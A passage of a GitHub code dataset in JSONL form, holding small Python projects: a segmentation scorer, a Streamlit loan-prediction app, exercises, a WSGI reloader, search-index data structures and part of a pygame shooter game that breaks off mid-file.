refs.keys())))\n    print('---')\n    print(\"\\n\".join(sorted(refs.keys() - preds.keys())))\n\n    assert not (preds.keys() - refs.keys())\n    assert not (refs.keys() - preds.keys())\n    assert not (refs.keys() - unambigs.keys())\n    assert not (unambigs.keys() - refs.keys())\n\n    return refs, preds, unambigs, input_refs\n\n\ndef calculate2(refs, preds, unambigs):\n    tp = fp = fn = 0\n    atp = afp = afn = 0\n    a = 0\n    for ref_text, ref_offsets in refs.items():\n        pred_offsets = preds[ref_text]\n        unambig_pred_offsets = unambigs[ref_text]\n        \n        tp += len(ref_offsets & pred_offsets)\n        fn += len(ref_offsets - pred_offsets)\n        fp += len(pred_offsets - ref_offsets)\n\n        # print(unambig_pred_offsets)\n\n        pred_offsets2 = pred_offsets - unambig_pred_offsets\n        ambig_ref_offsets = ref_offsets - unambig_pred_offsets\n        atp += len(ambig_ref_offsets & pred_offsets2)\n        afn += len(ambig_ref_offsets - pred_offsets2)\n        afp += len(pred_offsets2 - ambig_ref_offsets)\n\n        a += len(ambig_ref_offsets)\n    print(a)\n\n    print('ALL')\n    precision, recall, f1 = score(tp, fp, fn)\n\n    print('Ambig')\n    aprecision, arecall, af1 = score(atp, afp, afn)\n\n    return tp, fp, fn, precision, recall, f1, atp, afp, afn, aprecision, arecall, af1\n\n\nif __name__ == '__main__':\n    parser = ArgumentParser(description='Score segmentation (ignore spaces)')\n    parser.add_argument('disamb_path', help='path to disamb JSONL or TSV (reference)')\n    parser.add_argument('pred_path', help='path to predictions (Flair output)')\n    parser.add_argument('tsv_path', help='path to TSV input data (with tokens marked as ambiguous)')\n\n    args = parser.parse_args()\n    \n    refs, preds, unambigs, input_refs = calculate(args.disamb_path, args.pred_path, args.tsv_path)\n    calculate2(refs, preds, unambigs)\n\n    print('Against training')\n    calculate2(input_refs, preds, unambigs)\n","repo_name":"kwrobel-nlp/kftt","sub_path":"score_segmentation.py","file_name":"score_segmentation.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"15263937626","text":"import streamlit as st\r\nimport numpy as np\r\nimport pickle\r\n\r\nmodel = pickle.load(open('deployment.sav', 'rb'))\r\n\r\n\r\nst.title('Loan Prediction App')\r\n\r\ncredit_policy = st.slider(\"Credit Policy\",0,2,1)\r\nint_rate = st.slider(\"Interest Rate\",0.01,0.3,0.01)\r\ninstallment = st.slider(\"Installment\",10,1000,100)\r\nlog_annual_inc = st.slider(\"Log Annual Income\",0.0,6.0,0.8)\r\ndti = st.slider(\"Debt-to-Income Ratio\",0,30,10)\r\nfico = st.slider('FICO Credit Score',600,900,700)\r\ndays_with_cr_line = st.slider(\"Days with Credit Line\",0,30000,1000)\r\nrevol_bal = st.slider(\"Revolving Balance\",0,36000,1000)\r\nrevol_util = st.slider(\"Revolving Line Utilization Rate\",0,101,1)\r\ninq_last_6mths = st.slider(\"Inquiries in Last 6 Months\",0,7,1)\r\ndelinq_2yrs = st.slider(\"Delinquencies in Last 2 Years\",0,14,1)\r\npub_rec = st.slider(\"Public Records\",0,6,1)\r\npurpose_credit_card = st.slider('Purpose: Credit Card', 0,2,1)\r\npurpose_debt_consolidation = st.slider('Purpose: Debt Consolidation',0,2,1)\r\npurpose_educational = st.slider('Purpose: Educational',0,2,1)\r\npurpose_home_improvement = st.slider('Purpose: Home Improvement', 0,2,1)\r\npurpose_major_purchase = st.slider('Purpose: Major Purchase', 0,2,1)\r\npurpose_small_business = st.slider('Purpose: Small Business',0,2,1)\r\n\r\ndef predict():\r\n    # float() keeps fractional inputs such as the interest rate intact;\r\n    # casting to int would zero them out\r\n    features = [float(x) for x in [credit_policy, int_rate, installment, log_annual_inc, dti, fico, days_with_cr_line, revol_bal, revol_util, inq_last_6mths, delinq_2yrs, pub_rec, purpose_credit_card, purpose_debt_consolidation, purpose_educational, purpose_home_improvement, purpose_major_purchase, purpose_small_business]]\r\n    final_features = [np.array(features)]\r\n    prediction = model.predict(final_features)\r\n    \r\n    if prediction == 1:\r\n        st.success('The loan application is likely to be approved. :thumbsup:')\r\n    else:\r\n        st.warning('The loan application is likely to be rejected. :thumbsdown:')\r\ntrigger = st.button('Predict', on_click=predict)\r\n","repo_name":"ChetanSrikant/ML_project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"28993544378","text":"import itertools\npermutations = [list(i) for i in itertools.permutations([0,1,2,3,4,5,6,7,8,9])]\n\nprimes = [2,3,5,7,11,13,17]\ndef concat(digits, i):\n    return int(str(digits[i+1])+str(digits[i+2])+str(digits[i+3]))\n\nsolutions = []\nfor n in permutations:\n    digits = {}\n    for digit in n:\n        digits[digit+1] = n[digit]\n\n\n    count = 0\n    for i in range(1,8):\n        #print(i+1, i+2, i+3)\n        #print(primes[i-1])\n        triplet = concat(digits,i)\n        if triplet % primes[i-1] == 0:\n            count += 1\n        #if int(\"\".join(digits[i+1],digits[i+2],digits[i+3])) % primes[i-1] == 0:\n        #    count += 1\n    #print(count)\n\n    if count == 7:\n        solution = int(''.join(str(i) for i in n))\n        solutions.append(solution)\n\nanswer = sum(solutions)\nprint(answer)\n","repo_name":"harryboulton1/ProjectEuler-Solutions---Harry-Boulton","sub_path":"43.py","file_name":"43.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"74816647781","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 19 08:57:16 2020\n\n@author: barbora\n\"\"\"\n\n# Using 7-8, make sure the sandwich 'pastrami' appears in the list at least\n# three times. Add code near the beginning of your program to print a \n# message saying the deli has run out of pastrami, and then use your while \n# loop to remove all occurrences of 'pastrami' from sandwich_orders. Make
Make\n# sure no pastrami sandwiches end up in finished_sandwiches.\n\n# Create sandwich_orders list abd finished_sandwiches list\nsandwich_orders = ['tuna', 'pastrami', 'blt', 'ploughman\\'s', 'pastrami',\n 'smoked salmon', 'pastrami', 'ham & cheese', 'pastrami']\nfinished_sandwiches = []\n\n# Loop through the sandwiches and print messages\nprint(\"Bad news, we have run out of pastrami!\")\nwhile sandwich_orders:\n current_sandwich = sandwich_orders.pop(0)\n if (current_sandwich == 'pastrami'):\n continue\n print(f\"Your {current_sandwich} sandwich is being made.\")\n finished_sandwiches.append(current_sandwich)\n \n# Print all sandwiches\nfor sandwich in finished_sandwiches:\n print(f\"We have made your {sandwich} sandwich.\")\n \n# Alternatively\n#while 'pastrami' in sandwich_orders:\n# sandwich_orders.remove('pastrami')\n","repo_name":"barcern/python-crash-course","sub_path":"chapter7/7-9_no_pastrami.py","file_name":"7-9_no_pastrami.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74741362661","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Robust WSGI auto-reloading for development.\n#\n# Reload a WSGI application on source change. Keep the old code alive\n# when the change has syntax errors. Never close the socket, never refuse\n# a connection.\n#\n# Replacement for 'paster serve --reload config.ini'\n#\n# Daniel Holth \n\nimport os\nimport sys\nimport logging.config\nimport time\nimport threading\nimport ConfigParser\nfrom Queue import Empty\n\nfrom multiprocessing import Process, Queue, Event\nfrom multiprocessing import active_children\nfrom optparse import OptionParser\nfrom wsgiref.simple_server import make_server\n\nimport paste.deploy\nimport paste.reloader\n\nPOLL_INTERVAL = 1 # check for changes every n seconds.\nSPINUP_TIME = 10 # application must start within this time.\n\nclass Monitor(paste.reloader.Monitor):\n def __init__(self, tx=None, rx=None):\n paste.reloader.Monitor.__init__(self, POLL_INTERVAL)\n self.state = 'RUN'\n self.tx = tx\n self.rx = rx\n\n def periodic_reload(self):\n while not self.rx.is_set():\n if not self.check_reload():\n self.state = 'STANDBY'\n # inform code change\n self.tx.put({'pid':os.getpid(), 'status':'changed'})\n self.rx.wait(SPINUP_TIME)\n if self.rx.is_set():\n return\n self.state = 'RUN'\n self.module_mtimes = {}\n time.sleep(self.poll_interval)\n\ndef configure_logging(uri):\n \"\"\"Configure logging from the PasteDeploy .ini found at uri\"\"\"\n config_file = uri\n if config_file.startswith('config:'):\n config_file = config_file.split(':', 1)[1]\n parser = ConfigParser.ConfigParser()\n parser.read([config_file])\n if parser.has_section('loggers'):\n logging.config.fileConfig(config_file)\n\ndef serve(server, uri, tx, rx):\n try:\n configure_logging(uri)\n\n # load wsgi application\n app = paste.deploy.loadapp(uri)\n\n tx.put({'pid':os.getpid(), 'status':'loaded'})\n\n server.set_app(app)\n\n t = threading.Thread(target=server.serve_forever)\n t.setDaemon(True)\n t.start()\n\n monitor = Monitor(tx=tx, rx=rx)\n monitor.periodic_reload()\n\n except KeyboardInterrupt:\n pass\n\ndef serve_from_server(server_name, uri, tx, rx):\n \"\"\"Load named server from PasteDeploy .ini file and run.\n\n This will only work if multiple servers do not require access to\n an exclusive resource like a normal socket. 
In other words, this\n will not work with most WSGI servers.\n \n Intended for use with mongrel2_wsgi.\"\"\"\n\n try:\n configure_logging(uri)\n\n # load named server and default application:\n app = paste.deploy.loadapp(uri)\n server = paste.deploy.loadserver(uri, name=server_name)\n\n tx.put({'pid':os.getpid(), 'status':'loaded'})\n\n def go():\n server(app)\n\n t = threading.Thread(target=go)\n t.setDaemon(True)\n t.start()\n\n monitor = Monitor(tx=tx, rx=rx)\n monitor.periodic_reload()\n\n except KeyboardInterrupt:\n pass\n\ndef reloadwsgi(uri, host='localhost', port=8080, server_name=None):\n # tx, rx from the subprocess' perspective. \n tx = Queue()\n\n if not server_name:\n server = make_server(host, port, None)\n target = serve\n else:\n server = server_name\n target = serve_from_server\n\n def spinup():\n rx = Event()\n worker = Process(target=target, args=(server, uri, tx, rx))\n worker.rx = rx\n worker.start()\n return worker\n\n spinup()\n\n while True:\n try:\n msg = tx.get(True, 1)\n sys.stderr.write(\"%r\\n\" % msg)\n if msg['status'] == 'changed':\n spinup()\n elif msg['status'] == 'loaded':\n for worker in active_children():\n if worker.ident != msg['pid']:\n worker.rx.set()\n except Empty:\n if not active_children():\n return\n\ndef main():\n import optparse\n import os.path\n usage = \"\"\"Usage: %prog [options] config.ini\nRobust automatic reloading for WSGI development.\"\"\"\n parser = optparse.OptionParser(usage)\n parser.add_option(\"-s\", \"--s\", default=None, dest=\"server_name\",\n help=\"Load named server from [config.ini] instead of binding to a host and port.\")\n parser.add_option(\"-H\", \"--host\", dest=\"hostname\",\n default=\"localhost\", type=\"string\",\n help=\"Listen on hostname/address instead of localhost\")\n parser.add_option(\"-p\", \"--port\", dest=\"port\",\n default=8080, type=\"int\",\n help=\"Listen on port instead of 8080\")\n (options, args) = parser.parse_args()\n if len(args) != 1:\n parser.error(\"Must specify exactly one Paste Deploy .ini file.\")\n server_name = options.server_name\n host = options.hostname\n port = options.port\n config = os.path.abspath(args[0])\n reloadwsgi('config:%s' % config, host=host, port=port,\n server_name=server_name)\n\ndef app_factory(global_config, **local_conf):\n \"\"\"For testing.\"\"\"\n import wsgiref.simple_server\n return wsgiref.simple_server.demo_app\n\nif __name__ == \"__main__\":\n import reloadwsgi\n import pkg_resources\n import os.path\n resource = pkg_resources.resource_filename(__name__, 'test_reloadwsgi.ini')\n resource = os.path.abspath(resource)\n reloadwsgi.reloadwsgi('config:%s' % resource)\n","repo_name":"dholth/reloadwsgi","sub_path":"reloadwsgi.py","file_name":"reloadwsgi.py","file_ext":"py","file_size_in_byte":5535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31167849861","text":"from collections import OrderedDict\n\n\n# each user has a own history\n# each History stores up to 20 popular keywords\n# key: user_email or \"anonymous\"\n# value: History\nclass UserHistoryIndex(dict): \n def __init__(self):\n dict.__init__(self)\n\n # get user's history, if user history does not exist, create a new user history\n def get_history(self, _email):\n if _email in self.keys():\n return self[_email]\n # if user history does not exist, create a new user history\n self[_email] = History()\n return self[_email]\n\nclass History(OrderedDict): \n def __init__(self):\n OrderedDict.__init__(self) \n \n # the format of each entry 
is \n # keyword : (number of times searched, how recent the keyword is searched)\n # \"how recent the keyword is searched\" is recorded in an integer, 1 means most recent, larger number means the keyword is older\n def add_new_keywords(self, words_list): \n # make exsiting keywords old before adding new keyword\n self.make_keywords_old() \n \n for keyword in words_list:\n # the keyword has been searched before\n if keyword in self:\n self[keyword] = (self[keyword][0]+1,1)\n # the keyword has not been searched before \n else:\n self[keyword] = (1,1) \n \n # sort the history after adding new keyword\n self.sort() \n \n def sort(self):\n # sort key word by \"number of times searched\" first\n # if \"number of times searched\" is the same, rank depends on \"how recent the keyword is searched\"\n temp = OrderedDict(sorted(self.items(), key = lambda entry: (-entry[1][0], entry[1][1])))\n \n # assignment to self is not allowed, so we need to clear and add entries one by one \n self.clear() \n for entry in temp:\n self[entry] = temp[entry]\n\n # add 1 to \"how recent the keyword is searched\" for every existing \n def make_keywords_old(self): \n for keyword in self:\n self[keyword] = (self[keyword][0],self[keyword][1]+1)\n \n # get up to 20 popular keywords in history\n def get_popular(self): \n popular = OrderedDict()\n counter = 0\n for entry in self:\n popular[entry] = self[entry]\n counter += 1\n if counter >= 20:\n break\n return popular.items()\n\n# each user has a own RecentWords\n# each RecentWords stores up to 10 recent keywords\n# key: user_email\n# value: RecentWords\nclass UserRecentWordsIndex(dict): \n def __init__(self):\n dict.__init__(self)\n\n # get user's recent words list, if recent words list does not exist, create a new recent words list\n def get_recent_words(self, _email):\n if _email in self.keys():\n return self[_email]\n # if user does not exist, create a new recent words list\n self[_email] = RecentWords()\n return self[_email]\n\nclass RecentWords(list): \n def __init__(self):\n list.__init__(self) \n \n def add_new_keywords(self, words_list):\n for keyword in words_list:\n # if the recent words list reached max size\n if len(self) == 10:\n self.pop()\n # insert at the head of the list\n self.insert(0, keyword)\n\n\n# key is document id\n# value is document\nclass DocumentIndex(OrderedDict): \n def __init__(self):\n OrderedDict.__init__(self)\n\n def __setitem__(self, key, val):\n if not isinstance(key, int):\n raise ValueError(\"document_index key must be an int\")\n if not isinstance(val, Document):\n raise ValueError(\"document_index value must be a document\")\n return OrderedDict.__setitem__(self, key, val)\n\n# a data structure for each entry in the document index\nclass Document(): \n def __init__(self, url=\"\", depth=0, title=\"\", short_description=\"\", words=None):\n if not isinstance(url, basestring):\n raise ValueError(\"document url must be a basestring\")\n if not isinstance(depth, int):\n raise ValueError(\"document depth must be an int\")\n if not isinstance(title, basestring):\n raise ValueError(\"document title must be a basestring\")\n if not isinstance(short_description, basestring):\n raise ValueError(\"document short_description must be a basestring\")\n self.url = url\n self.depth = depth\n self.title = title\n self.short_description = short_description \n self.words = words \n\n def __repr__(self):\n if self.words:\n return \", \".join([self.url, str(self.depth), self.title, self.short_description, str(len(self.words))])\n else:\n return \", 
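# Usage sketch for the index classes in this module: InvertedIndex (defined
# below) accumulates a font-size weight per (word, document) pair. The ids
# here are illustrative:
#
#     idx = InvertedIndex()
#     idx.add(word_id=7, document_id=1, font_size=3)
#     idx.add(word_id=7, document_id=1, font_size=2)
#     assert idx[7] == {1: 5}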
\".join([self.url, str(self.depth), self.title, self.short_description, \"\", \"\"])\n\n# key is word id\n# value is as set of document ids\nclass InvertedIndex(dict): \n def __init__(self):\n dict.__init__(self)\n\n def __setitem__(self, key, val):\n if not isinstance(key, int):\n raise ValueError(\"inverted_index key must be an int\")\n #if not isinstance(val, dict):\n # raise ValueError(\"inverted_index value must be a dict\")\n return dict.__setitem__(self, key, val)\n\n def add(self, word_id, document_id, font_size):\n if not isinstance(word_id, int):\n raise ValueError(\"word_id must be an int\")\n if not isinstance(document_id, int):\n raise ValueError(\"document_id must be an int\")\n\n if word_id in self:\n if document_id in self[word_id]:\n self[word_id][document_id] += font_size\n else:\n self[word_id][document_id] = font_size\n else:\n self[word_id] = { }\n self[word_id][document_id] = font_size\n\n# key is word string\n# value is as set of document urls\nclass ResolvedInvertedIndex(dict): \n def __init__(self):\n dict.__init__(self)\n\n def __setitem__(self, key, val):\n if not isinstance(key, basestring):\n raise ValueError(\"resolved_inverted_index key must be a basestring\")\n if not isinstance(val, set):\n raise ValueError(\"resolved_inverted_index value must be a set\")\n return dict.__setitem__(self, key, val)\n\n def add(self, word_str, document_url):\n if not isinstance(word_str, basestring):\n raise ValueError(\"word_str must be a basestring\")\n if not isinstance(document_url, basestring):\n raise ValueError(\"document_url must be a basestring\")\n\n if word_str in self:\n self[word_str].add(document_url)\n else:\n self[word_str] = set([document_url])","repo_name":"ganyangut/csc326","sub_path":"instance_deployment/copy_to_aws/lab4_code/backend/data_structures.py","file_name":"data_structures.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"40531384773","text":"def erange(*args):\n if len(args) > 3 or len(args) == 0:\n raise TypeError(\n f\"erange expected {3 if len(args) > 3 else 1} arguments, got {len(args)}\")\n if any([type(i) != int for i in args]):\n raise TypeError(\"all arguments must be of type 'int'\")\n\n start = args[0] if len(args) >= 2 else 0\n stop = args[0] if len(args) == 1 else args[1]\n step = args[2] if len(args) == 3 else 1\n\n if step == 0:\n raise ValueError(\"step arg must not be 0\")\n\n i = start\n while (i < stop) if step > 0 else (i > stop):\n yield i\n i += step\n\n\ndef numerate(elements, start=0):\n i = 0\n for v in elements[start:]:\n yield (i, v)\n i += 1","repo_name":"banana-galaxy/challenges","sub_path":"challenge5(ranges)/Takos.py","file_name":"Takos.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"31608832227","text":"import pygame\nimport pygame.image\nimport pygame.time\nimport pygame.mixer\nimport pygame.event\nimport pygame.display\nimport pygame.key\n# 导入pygame的全部常量模块\nfrom pygame.locals import *\nimport pygame.sprite\nimport pygame.mask\nimport pygame.draw\nimport pygame.font\n\nimport sys\nimport traceback # 异常捕捉模块\nimport myplane\nimport enemy\nimport bullet\nimport supply\nimport random\n\n# 游戏模块初始化\npygame.init()\n# 混音器初始化\npygame.mixer.init()\n\n# 定义游戏画面大小\nbg_size = width, height = 480, 700\n# 设置游戏屏幕大小\nscreen = pygame.display.set_mode(bg_size)\n# 设置游戏标题\npygame.display.set_caption('飞机大战 -- Demo')\n\nbackground 
= pygame.image.load('images/background.png').convert_alpha()\n\n# 音乐和音效\npygame.mixer.music.load(\"sound/game_music.ogg\")\npygame.mixer.music.set_volume(0.1)\nbullet_sound = pygame.mixer.Sound(\"sound/bullet.wav\")\nbullet_sound.set_volume(0.2)\nbomb_sound = pygame.mixer.Sound(\"sound/use_bomb.wav\")\nbomb_sound.set_volume(0.2)\nsupply_sound = pygame.mixer.Sound(\"sound/supply.wav\")\nsupply_sound.set_volume(0.2)\nget_bomb_sound = pygame.mixer.Sound(\"sound/get_bomb.wav\")\nget_bomb_sound.set_volume(0.2)\nget_bullet_sound = pygame.mixer.Sound(\"sound/get_bullet.wav\")\nget_bullet_sound.set_volume(0.2)\nupgrade_sound = pygame.mixer.Sound(\"sound/upgrade.wav\")\nupgrade_sound.set_volume(0.2)\nenemy3_fly_sound = pygame.mixer.Sound(\"sound/enemy3_flying.wav\")\nenemy3_fly_sound.set_volume(0.2)\nenemy1_down_sound = pygame.mixer.Sound(\"sound/enemy1_down.wav\")\nenemy1_down_sound.set_volume(0.2)\nenemy2_down_sound = pygame.mixer.Sound(\"sound/enemy2_down.wav\")\nenemy2_down_sound.set_volume(0.3)\nenemy3_down_sound = pygame.mixer.Sound(\"sound/enemy3_down.wav\")\nenemy3_down_sound.set_volume(0.5)\nme_down_sound = pygame.mixer.Sound(\"sound/me_down.wav\")\nme_down_sound.set_volume(0.2)\n\n# 用于下面增加游戏难度的方法 和实例化飞机\ndef add_small_enemies(group1, group2, num):\n for i in range(num):\n e1 = enemy.SmallEnemy(bg_size)\n # group() 用add 列表用append\n group1.add(e1)\n group2.add(e1)\n\n# 用于下面增加游戏难度的方法 和实例化飞机\ndef add_mid_enemies(group1, group2, num):\n for i in range(num):\n e2 = enemy.MidEnemy(bg_size)\n group1.add(e2)\n group2.add(e2)\n\n# 用于下面增加游戏难度的方法 和实例化飞机\ndef add_big_enemies(group1, group2, num):\n for i in range(num):\n e3 = enemy.BigEnemy(bg_size)\n group1.add(e3)\n group2.add(e3)\n# 增加目标机型的速度\ndef inc_speed(target, inc):\n for i in target:\n i.speed += inc\n\n# 主函数\ndef main():\n # 无限循环播放音乐\n pygame.mixer.music.play(-1)\n # 设置游戏帧率参数\n clock = pygame.time.Clock()\n # 用于切换飞机图片 达到动态在突突突的飞行效果\n switch_image = True\n # 因为图片切换看不出效果 所以加一个延迟 毫秒\n delay = 100\n\n # 生成我方飞机对象\n me = myplane.MyPlane(bg_size)\n # 生成一个敌方飞机的Group,用于之后的碰撞检测\n enemies = pygame.sprite.Group()\n\n # 生成小飞机对象 一枪一个\n small_enemies = pygame.sprite.Group()\n # 用于后面增加游戏难度和初始化飞机个数\n add_small_enemies(small_enemies, enemies, 15)\n\n # 生成中飞机对象 多枪一个\n mid_enemies = pygame.sprite.Group()\n # 用于后面增加游戏难度和初始化飞机个数\n add_mid_enemies(mid_enemies, enemies, 20)\n\n # 生成大飞机对象 超多枪一个\n big_enemies = pygame.sprite.Group()\n # 用于后面增加游戏难度和初始化飞机个数\n add_big_enemies(big_enemies, enemies, 10)\n\n # 敌机中弹/摧毁 时图片索引\n e1_destroy_index = 0\n e2_destroy_index = 0\n e3_destroy_index = 0\n me_destroy_index = 0\n\n # 实例化子弹\n # 子弹数\n bullet1 = []\n BULLET1_NUM = 4\n bullet1_index = 0\n for i in range(BULLET1_NUM):\n bullet1.append(bullet.Bullet1(me.rect.midtop))\n\n # 定义几个颜色,用于后面绘制飞机血量\n black = (0, 0, 0)\n green = (0, 255, 0)\n red = (255, 0, 0)\n white = (255, 255, 255) # 分数的颜色(score)\n\n # 统计得分\n score = 0\n # 分数用的字体样式 和 字体大小\n score_font = pygame.font.Font('font/font.ttf', 36)\n\n # 实现一个暂停和继续游戏的功能\n # 设置一个参数用来标志是否暂停游戏\n paused = False\n\n pause_nor_image = pygame.image.load('images/pause_nor.png').convert_alpha() # 图一\n pause_pressed_image = pygame.image.load('images/pause_pressed.png').convert_alpha()# 鼠标放置在图一上时,显示这个动效图片,增加互动性\n resume_nor_image = pygame.image.load('images/resume_nor.png').convert_alpha() # 图二\n resume_pressed_image = pygame.image.load('images/resume_pressed.png').convert_alpha()# 鼠标放置在图二上时,显示这个动效图片,增加互动性\n # 获取一个图片的限定矩形(四个大小都一样)\n paused_rect = pause_nor_image.get_rect()\n # 暂停继续放在右上角( 减10 是为了美观)\n paused_rect.left, paused_rect.top = width - 
paused_rect.width - 10, 10\n # 设置默认显示 (默认右上角显示没有把鼠标放在暂停图片上的图片)\n paused_image = pause_nor_image\n\n # 增加调整游戏难度的参数\n level = 1\n # 增加全屏炸弹左下角字样\n bomb_image = pygame.image.load('images/bomb.png').convert_alpha()\n bomb_rect = bomb_image.get_rect()\n bomb_rect.left, bomb_rect.top = 10, height - 10 - bomb_rect.height\n bomd_font = pygame.font.Font('font/font.ttf', 36)\n bomb_num = 3\n\n # 增加炸弹和双枪支援\n # 实例化双枪补给\n double_supply = supply.Bullet_Supply(bg_size)\n # 实例化炸弹补给\n bomb_supply = supply.Bomb_Supply(bg_size)\n # 添加自定义事件 用来控制每30 秒提供一次支援\n Supply_EVENT = pygame.USEREVENT\n pygame.time.set_timer(Supply_EVENT, 10 * 1000)\n\n # 增加一个自定义时间事件用来记录双枪的持续时间\n Double_Bullet_Event = pygame.USEREVENT + 1\n # 增加一个变量用来记录是否使用超级子弹 默认为没有使用\n is_double_bullet = False\n # 实例化双枪子弹\n bullet2 = []\n bullet2_index = 0\n BULLET2_NUM = 8\n # 因为我们遍历一次添加两个子弹对象 所以BULLET2_NUM // 2\n for each in range(BULLET2_NUM // 2):\n bullet2.append(bullet.Bullet2((me.rect.centerx - 33, me.rect.centery - 50)))\n bullet2.append(bullet.Bullet2((me.rect.centerx + 30, me.rect.centery - 50)))\n\n # 设置一个参数,记录是否暂停过游戏\n # 用于后面支援事件继续从上次暂停的事件继续,而不是从头再计时\n # 没有实现,遗留BUG\n\n # 我方飞机生命的小图片\n life_image = pygame.image.load('images/life.png').convert_alpha()\n life_image_rect = life_image.get_rect()\n\n # 我方飞机生命数\n life_num = 3\n\n # 定义一个自定义事件,用于我方飞机重生后无敌三秒\n Invincible_Event = pygame.USEREVENT + 2\n\n # 定义一个参数,用来阻止结束时重复打开和关闭文件\n recorded = False\n\n # 游戏结束时的按钮图片\n gameover_font = pygame.font.Font('font/font.ttf', 48) # 重写一次是因为与上次的大小不一样\n again_image = pygame.image.load('images/again.png').convert_alpha()\n again_rect = again_image.get_rect()\n gameover_image = pygame.image.load('images/gameover.png').convert_alpha()\n gameover_rect = gameover_image.get_rect()\n\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n # 用更好的退出方式\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n # 检测鼠标 当前的点是否放置在图片限定矩形上 并且是否按下了左键\n if event.button == 1 and paused_rect.collidepoint(event.pos):\n paused = not paused\n # 这儿添加的代码用来暂停游戏时停止背景音乐和音效\n if paused:\n # 停背景音乐\n pygame.mixer.music.pause()\n # 停音效(大飞机出生音效)\n pygame.mixer.pause()\n else:\n pygame.mixer.music.unpause()\n pygame.mixer.unpause()\n\n\n if event.type == pygame.MOUSEMOTION:\n # 检测鼠标当前的点是否放置在图片限定矩形上\n if paused_rect.collidepoint(event.pos):\n if paused:\n paused_image = resume_pressed_image\n else:\n pygame.mixer.music.unpause()\n paused_image = pause_pressed_image\n else:\n if paused:\n paused_image = resume_nor_image\n else:\n paused_image = pause_nor_image\n if event.type == pygame.KEYDOWN:\n # 检测是否是激活状态 且 是否按下了空格键\n if event.key == pygame.K_SPACE and not paused:\n # 有炸弹才能执行\n if bomb_num:\n bomb_num -= 1\n # 按下暂停键时遍历飞机 设置为摧毁状态\n for i in enemies:\n if i.rect.bottom > 0:\n i.active = False\n # 检测到补给时间到时,随机投放\n if event.type == Supply_EVENT and not paused:\n supply_sound.play()\n # 随机选一个\n if random.choice([False, True]):\n # True时,投放全屏炸弹\n bomb_supply.reset()\n else:\n # False 是,投放双枪子弹\n double_supply.reset()\n # 检测是否产生了双枪事件\n if event.type == Double_Bullet_Event:\n # 拾取到双枪之后,计时器开始工作,工作五秒后再产生一个Double_Bullet_Event自定义事件,标志着持续时间结束\n is_double_bullet = False\n # 取消关注定时器\n pygame.time.set_timer(Double_Bullet_Event, 0)\n # 检测到我方飞机无敌时间结束 解除无敌\n if event.type == Invincible_Event:\n # 检测到结束时停止该事件 并解除无敌\n pygame.time.set_timer(Invincible_Event, 0)\n me.invincible = False\n\n # 绘制背景图至窗口 (0,0) 相对窗口的位置\n # 绘制在 if not paused: 前是因为在点击暂停之后需要将战局用background覆盖,防止用户通过频繁的暂停和开始来躲避敌机\n screen.blit(background, (0, 0))\n\n # 根据分数调整当前游戏难度\n if level == 1 and 
score > 50000:\n level = 2\n # 难度增加的提示音效\n upgrade_sound.play()\n add_small_enemies(small_enemies, enemies, 3)\n add_mid_enemies(mid_enemies, enemies, 2)\n add_big_enemies(big_enemies, enemies, 1)\n # 增加小型机速度\n inc_speed(small_enemies, 1)\n elif level == 2 and score > 300000:\n level = 3\n upgrade_sound.play()\n add_small_enemies(small_enemies, enemies, 5)\n add_mid_enemies(mid_enemies, enemies, 3)\n add_big_enemies(big_enemies, enemies, 2)\n # 增加小、中型机速度\n inc_speed(small_enemies, 1)\n inc_speed(mid_enemies, 1)\n elif level == 3 and score > 600000:\n level = 4\n upgrade_sound.play()\n add_small_enemies(small_enemies, enemies, 5)\n add_mid_enemies(mid_enemies, enemies, 3)\n add_big_enemies(big_enemies, enemies, 2)\n # 增加小、中型机速度\n inc_speed(small_enemies, 1)\n inc_speed(mid_enemies, 1)\n\n # 只有为True 才能运行\n if not paused and life_num:\n # 检测用户的键盘操作 (序列) # 获取到的是键盘所有键的状态序列,存储每个键是否按下(True,False)\n # 频繁键盘事件用此方法\n key_pressed = pygame.key.get_pressed()\n\n # W 按键和上方向键都可以控制\n if key_pressed[K_w] or key_pressed[K_UP]:\n me.moveUp()\n if key_pressed[K_s] or key_pressed[K_DOWN]:\n me.moveDown()\n if key_pressed[K_a] or key_pressed[K_LEFT]:\n me.moveLeft()\n if key_pressed[K_d] or key_pressed[K_RIGHT]:\n me.moveRight()\n\n # 如果随机到炸弹补给\n # 用一个对象前,先检测是否是我们想要的状态,是才执行\n if bomb_supply.active:\n screen.blit(bomb_supply.image, bomb_supply.rect)\n bomb_supply.move()\n # 检测两个精灵是否碰撞 pygame.sprite.collide_mask(精灵1, 精灵2)\n if pygame.sprite.collide_mask(bomb_supply, me):\n bomb_supply.active = False\n # 拾取到全屏炸弹\n get_bomb_sound.play()\n # 检测炸弹数是否小于3,小于3个才增加\n if bomb_num < 3:\n bomb_num += 1\n # 如果随加到双枪补给\n if double_supply.active:\n screen.blit(double_supply.image, double_supply.rect)\n double_supply.move()\n if pygame.sprite.collide_mask(double_supply, me):\n get_bullet_sound.play()\n # 检测到拾取到补给后,设置记录双枪的变量为True,用来后面发射双枪\n is_double_bullet = True\n # 检测到拾取到双枪补给后,开始产生一个双枪自定义事件,五秒后再次产生一个此事件\n pygame.time.set_timer(Double_Bullet_Event, 5 * 1000)\n # 拾取到之后应设置属性为False\n double_supply.active = False\n\n # 检测到双枪变量为True后\n if is_double_bullet:\n if not(delay % 